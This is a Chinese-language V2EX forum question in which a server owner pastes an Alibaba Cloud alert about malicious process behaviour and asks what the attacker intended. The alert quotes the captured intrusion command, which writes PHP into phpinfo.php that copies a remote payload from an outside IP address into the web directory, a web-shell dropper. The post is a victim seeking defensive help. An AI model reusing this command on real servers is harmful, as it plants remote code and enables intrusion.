V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
Woood
V2EX  ›  问与答

收到阿里云进程异常行为-访问恶意下载源的报警。请问各位大佬,这个‘大佬’是想做什么?

  •  
  •   Woood · 2019-12-31 15:33:56 +08:00 · 2830 次点击
    这是一个创建于 1787 天前的主题,其中的信息可能已经有所发展或是发生改变。
    父进程 id:4776
    进程 id:4882
    用户名:www-data
    URL 链接: http://100.43.136.34:1717/shiqi/11.txt
    进程路径:/bin/dash
    命令行参数:sh -c echo "<?php echo copy("http://100.43.136.34:1717/shiqi/11.txt","phpinfo.php");echo "Gif89a" ?>" >>phpinfo.php
    与该 URL 有关联的漏洞:None
    事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
    解决方案:请及时排查告警中提示的恶意 URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
    目前尚无回复
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1260 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 17:55 · PVG 01:55 · LAX 09:55 · JFK 12:55
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.